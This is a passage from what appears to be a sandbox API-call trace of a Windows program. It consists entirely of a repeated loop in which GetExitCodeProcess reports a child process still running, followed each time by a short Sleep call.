(dwMilliseconds=0x19) [0257.665] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0257.665] Sleep (dwMilliseconds=0x19) [0257.705] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0257.705] Sleep (dwMilliseconds=0x19) [0257.743] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0257.743] Sleep (dwMilliseconds=0x19) [0257.784] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0257.784] Sleep (dwMilliseconds=0x19) [0257.872] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0257.873] Sleep (dwMilliseconds=0x19) [0257.908] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0257.908] Sleep (dwMilliseconds=0x19) [0257.944] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0257.944] Sleep (dwMilliseconds=0x19) [0258.021] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.021] Sleep (dwMilliseconds=0x19) [0258.093] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.094] Sleep (dwMilliseconds=0x19) [0258.129] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.129] Sleep (dwMilliseconds=0x19) [0258.178] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.178] Sleep (dwMilliseconds=0x19) [0258.212] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.212] Sleep (dwMilliseconds=0x19) [0258.253] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.253] Sleep (dwMilliseconds=0x19) [0258.290] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.290] Sleep (dwMilliseconds=0x19) [0258.324] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.325] Sleep (dwMilliseconds=0x19) [0258.370] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.370] Sleep (dwMilliseconds=0x19) [0258.440] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.440] Sleep (dwMilliseconds=0x19) [0258.510] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.510] Sleep (dwMilliseconds=0x19) [0258.544] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.544] Sleep (dwMilliseconds=0x19) [0258.578] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.578] Sleep (dwMilliseconds=0x19) [0258.612] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.612] Sleep (dwMilliseconds=0x19) [0258.694] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.694] Sleep (dwMilliseconds=0x19) [0258.750] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.750] Sleep (dwMilliseconds=0x19) [0258.794] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.795] Sleep (dwMilliseconds=0x19) [0258.830] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.830] Sleep (dwMilliseconds=0x19) [0258.864] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.864] Sleep (dwMilliseconds=0x19) [0258.936] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0258.936] Sleep (dwMilliseconds=0x19) [0259.134] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0259.134] Sleep (dwMilliseconds=0x19) [0259.264] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0259.264] Sleep (dwMilliseconds=0x19) [0259.320] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0259.321] Sleep (dwMilliseconds=0x19) [0259.356] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0259.356] Sleep (dwMilliseconds=0x19) [0259.437] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0259.437] Sleep (dwMilliseconds=0x19) [0259.502] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0259.502] Sleep (dwMilliseconds=0x19) [0259.536] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0259.537] Sleep (dwMilliseconds=0x19) [0259.613] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0259.613] Sleep (dwMilliseconds=0x19) [0259.713] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0259.713] Sleep (dwMilliseconds=0x19) [0259.750] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0259.750] Sleep (dwMilliseconds=0x19) [0259.843] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0259.843] Sleep (dwMilliseconds=0x19) [0259.892] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0259.892] Sleep (dwMilliseconds=0x19) [0259.973] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0259.974] Sleep (dwMilliseconds=0x19) [0260.084] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0260.084] Sleep (dwMilliseconds=0x19) [0260.123] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0260.123] Sleep (dwMilliseconds=0x19) [0260.162] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0260.162] Sleep (dwMilliseconds=0x19) [0260.271] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0260.271] Sleep (dwMilliseconds=0x19) [0260.308] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0260.308] Sleep (dwMilliseconds=0x19) [0260.378] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0260.378] Sleep (dwMilliseconds=0x19) [0260.412] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0260.413] Sleep (dwMilliseconds=0x19) [0260.530] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0260.530] Sleep (dwMilliseconds=0x19) [0260.647] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0260.647] Sleep (dwMilliseconds=0x19) [0260.691] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0260.691] Sleep (dwMilliseconds=0x19) [0260.750] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0260.750] Sleep (dwMilliseconds=0x19) [0260.787] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0260.787] Sleep (dwMilliseconds=0x19) [0260.823] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0260.823] Sleep (dwMilliseconds=0x19) [0260.917] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0260.918] Sleep (dwMilliseconds=0x19) [0261.036] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0261.036] Sleep (dwMilliseconds=0x19) [0261.109] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0261.110] Sleep (dwMilliseconds=0x19) [0261.192] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0261.192] Sleep (dwMilliseconds=0x19) [0261.230] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0261.230] Sleep (dwMilliseconds=0x19) [0261.271] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0261.271] Sleep (dwMilliseconds=0x19) [0261.318] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0261.318] Sleep (dwMilliseconds=0x19) [0261.415] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0261.415] Sleep (dwMilliseconds=0x19) [0261.504] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0261.504] Sleep (dwMilliseconds=0x19) [0261.538] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0261.539] Sleep (dwMilliseconds=0x19) [0261.576] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0261.576] Sleep (dwMilliseconds=0x19) [0261.648] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0261.648] Sleep (dwMilliseconds=0x19) [0261.686] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0261.687] Sleep (dwMilliseconds=0x19) [0261.727] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0261.727] Sleep (dwMilliseconds=0x19) [0261.840] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0261.840] Sleep (dwMilliseconds=0x19) [0261.911] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0261.912] Sleep (dwMilliseconds=0x19) [0261.947] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0261.948] Sleep (dwMilliseconds=0x19) [0262.062] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0262.063] Sleep (dwMilliseconds=0x19) [0262.104] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0262.104] Sleep (dwMilliseconds=0x19) [0262.144] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0262.144] Sleep (dwMilliseconds=0x19) [0262.192] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0262.192] Sleep (dwMilliseconds=0x19) [0262.226] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0262.226] Sleep (dwMilliseconds=0x19) [0262.261] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0262.261] Sleep (dwMilliseconds=0x19) [0262.309] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0262.309] Sleep (dwMilliseconds=0x19) [0262.535] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0262.535] Sleep (dwMilliseconds=0x19) [0262.627] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0262.627] Sleep (dwMilliseconds=0x19) [0262.662] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0262.662] Sleep (dwMilliseconds=0x19) [0262.708] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0262.708] Sleep (dwMilliseconds=0x19) [0262.828] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0262.828] Sleep (dwMilliseconds=0x19) [0262.948] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0262.948] Sleep (dwMilliseconds=0x19) [0263.063] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0263.063] Sleep (dwMilliseconds=0x19) [0263.229] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0263.229] Sleep (dwMilliseconds=0x19) [0263.296] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0263.296] Sleep (dwMilliseconds=0x19) [0263.331] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0263.331] Sleep (dwMilliseconds=0x19) [0263.367] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0263.367] Sleep (dwMilliseconds=0x19) [0263.401] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0263.401] Sleep (dwMilliseconds=0x19) [0263.458] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0263.458] Sleep (dwMilliseconds=0x19) [0263.493] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0263.493] Sleep (dwMilliseconds=0x19) [0263.580] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0263.580] Sleep (dwMilliseconds=0x19) [0263.730] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0263.731] Sleep (dwMilliseconds=0x19) [0263.769] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0263.769] Sleep (dwMilliseconds=0x19) [0263.807] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0263.807] Sleep (dwMilliseconds=0x19) [0263.842] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0263.842] Sleep (dwMilliseconds=0x19) [0263.890] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0263.891] Sleep (dwMilliseconds=0x19) [0263.947] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0263.948] Sleep (dwMilliseconds=0x19) [0264.029] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0264.029] Sleep (dwMilliseconds=0x19) [0264.078] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0264.078] Sleep (dwMilliseconds=0x19) [0264.151] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0264.152] Sleep (dwMilliseconds=0x19) [0264.248] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0264.248] Sleep (dwMilliseconds=0x19) [0264.280] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0264.280] Sleep (dwMilliseconds=0x19) [0264.308] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0264.308] Sleep (dwMilliseconds=0x19) [0264.364] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0264.365] Sleep (dwMilliseconds=0x19) [0264.427] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0264.427] Sleep (dwMilliseconds=0x19) [0264.457] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0264.457] Sleep (dwMilliseconds=0x19) [0264.517] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0264.517] Sleep (dwMilliseconds=0x19) [0264.692] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0264.692] Sleep (dwMilliseconds=0x19) [0264.728] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0264.728] Sleep (dwMilliseconds=0x19) [0264.786] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0264.786] Sleep (dwMilliseconds=0x19) [0264.821] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0264.821] Sleep (dwMilliseconds=0x19) [0264.876] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0264.876] Sleep (dwMilliseconds=0x19) [0264.907] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0264.908] Sleep (dwMilliseconds=0x19) [0264.938] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0264.938] Sleep (dwMilliseconds=0x19) [0265.025] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.025] Sleep (dwMilliseconds=0x19) [0265.064] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.064] Sleep (dwMilliseconds=0x19) [0265.099] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.099] Sleep (dwMilliseconds=0x19) [0265.165] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.165] Sleep (dwMilliseconds=0x19) [0265.206] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.206] Sleep (dwMilliseconds=0x19) [0265.241] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.241] Sleep (dwMilliseconds=0x19) [0265.275] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.275] Sleep (dwMilliseconds=0x19) [0265.310] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.310] Sleep (dwMilliseconds=0x19) [0265.377] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.377] Sleep (dwMilliseconds=0x19) [0265.412] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.412] Sleep (dwMilliseconds=0x19) [0265.445] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.446] Sleep (dwMilliseconds=0x19) [0265.485] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.485] Sleep (dwMilliseconds=0x19) [0265.521] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.521] Sleep (dwMilliseconds=0x19) [0265.556] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.556] Sleep (dwMilliseconds=0x19) [0265.685] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.685] Sleep (dwMilliseconds=0x19) [0265.721] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.721] Sleep (dwMilliseconds=0x19) [0265.761] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.761] Sleep (dwMilliseconds=0x19) [0265.800] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.800] Sleep (dwMilliseconds=0x19) [0265.834] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.834] Sleep (dwMilliseconds=0x19) [0265.868] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.868] Sleep (dwMilliseconds=0x19) [0265.906] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.906] Sleep (dwMilliseconds=0x19) [0265.948] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0265.948] Sleep (dwMilliseconds=0x19) [0266.023] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0266.024] Sleep (dwMilliseconds=0x19) [0266.083] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0266.083] Sleep (dwMilliseconds=0x19) [0266.130] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0266.130] Sleep (dwMilliseconds=0x19) [0266.174] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0266.174] Sleep (dwMilliseconds=0x19) [0266.214] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0266.214] Sleep (dwMilliseconds=0x19) [0266.252] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0266.252] Sleep (dwMilliseconds=0x19) [0266.288] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0266.288] Sleep (dwMilliseconds=0x19) [0266.400] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0266.400] Sleep (dwMilliseconds=0x19) [0266.462] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0266.462] Sleep (dwMilliseconds=0x19) [0266.499] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0266.499] Sleep (dwMilliseconds=0x19) [0266.534] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0266.534] Sleep (dwMilliseconds=0x19) [0266.700] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0266.700] Sleep (dwMilliseconds=0x19) [0266.752] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0266.752] Sleep (dwMilliseconds=0x19) [0266.938] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0266.938] Sleep (dwMilliseconds=0x19) [0267.033] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.033] Sleep (dwMilliseconds=0x19) [0267.075] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.075] Sleep (dwMilliseconds=0x19) [0267.113] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.113] Sleep (dwMilliseconds=0x19) [0267.159] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.159] Sleep (dwMilliseconds=0x19) [0267.213] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.213] Sleep (dwMilliseconds=0x19) [0267.248] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.248] Sleep (dwMilliseconds=0x19) [0267.285] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.285] Sleep (dwMilliseconds=0x19) [0267.326] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0267.326] Sleep (dwMilliseconds=0x19) [0267.400] GetExitCodeProcess (in: hProcess=0x40c, 